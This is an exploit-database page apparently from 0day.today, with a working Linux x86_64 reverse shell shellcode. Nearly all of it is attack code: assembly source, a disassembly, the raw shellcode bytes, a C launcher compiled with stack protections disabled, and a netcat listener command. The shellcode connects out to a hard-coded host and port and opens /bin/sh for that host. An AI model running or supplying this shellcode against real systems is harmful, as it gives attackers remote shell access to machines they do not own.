0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)
[/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - Reverse Shell Shellcode
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 18/07/2017
;Architecture: Linux x86_64
;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
##########
# Source #
##########
section .text
global _start
_start:
push rbp
mov rbp,rsp
xor rdx, rdx
push 1
pop rsi
push 2
pop rdi
push 41
pop rax ; sys_socket
syscall
sub rsp, 8
mov dword [rsp], 0x5c110002 ; Port 4444, 4Bytes: 0xPORT + Fill with '0's + 2
mov dword [rsp+4], 0x801a8c0 ; IP Address 192.168.1.8, 4Bytes: 0xIPAddress (Little Endiannes)
lea rsi, [rsp]
add rsp, 8
pop rbx
xor rbx, rbx
push 16
pop rdx
push 3
pop rdi
push 42
pop rax; sys_connect
syscall
xor rsi, rsi
shell_loop:
mov al, 33
syscall
inc rsi
cmp rsi, 2
jle shell_loop
xor rax, rax
xor rsi, rsi
mov rdi, 0x68732f6e69622f2f
push rsi
push rdi
mov rdi, rsp
xor rdx, rdx
mov al, 59
syscall
#################################
# Compile and execute with NASM #
#################################
nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
ld reverse_tcp_shell.o -o reverse_tcp_shell
#########################
# objdump --disassemble #
#########################
reverse_tcp_shell: file format elf64-x86-64
Disassembly of section .text:
0000000000400080 <_start>:
400080: 55 push %rbp
400081: 48 89 e5 mov %rsp,%rbp
400084: 48 31 d2 xor %rdx,%rdx
400087: 6a 01 pushq $0x1
400089: 5e pop %rsi
40008a: 6a 02 pushq $0x2
40008c: 5f pop %rdi
40008d: 6a 29 pushq $0x29
40008f: 58 pop %rax
400090: 0f 05 syscall
400092: 48 83 ec 08 sub $0x8,%rsp
400096: c7 04 24 02 00 11 5c movl $0x5c110002,(%rsp)
40009d: c7 44 24 04 c0 a8 01 movl $0x801a8c0,0x4(%rsp)
4000a4: 08
4000a5: 48 8d 34 24 lea (%rsp),%rsi
4000a9: 48 83 c4 08 add $0x8,%rsp
4000ad: 5b pop %rbx
4000ae: 48 31 db xor %rbx,%rbx
4000b1: 6a 10 pushq $0x10
4000b3: 5a pop %rdx
4000b4: 6a 03 pushq $0x3
4000b6: 5f pop %rdi
4000b7: 6a 2a pushq $0x2a
4000b9: 58 pop %rax
4000ba: 0f 05 syscall
4000bc: 48 31 f6 xor %rsi,%rsi
00000000004000bf <shell_loop>:
4000bf: b0 21 mov $0x21,%al
4000c1: 0f 05 syscall
4000c3: 48 ff c6 inc %rsi
4000c6: 48 83 fe 02 cmp $0x2,%rsi
4000ca: 7e f3 jle 4000bf <shell_loop>
4000cc: 48 31 c0 xor %rax,%rax
4000cf: 48 31 f6 xor %rsi,%rsi
4000d2: 48 bf 2f 2f 62 69 6e movabs $0x68732f6e69622f2f,%rdi
4000d9: 2f 73 68
4000dc: 56 push %rsi
4000dd: 57 push %rdi
4000de: 48 89 e7 mov %rsp,%rdi
4000e1: 48 31 d2 xor %rdx,%rdx
4000e4: b0 3b mov $0x3b,%al
4000e6: 0f 05 syscall
#######################
# 104 Bytes Shellcode #
#######################
for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05
########
# Test #
########
In the asm source:
mov dword [rsp+4], 0x801a8c0 <IP Address (Little Endian) of the host that will receive the shell>
In the host that will receive the shell run:
nc -vvlp 4444
On the target machine:
compile with:
gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
run:
./reverse_tcp_shell
<!> gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
*/
#include <stdio.h>
unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
main()
{
int (*ret)() = (int(*)())shellcode;
ret();
}
# 0day.today [2024-12-27] #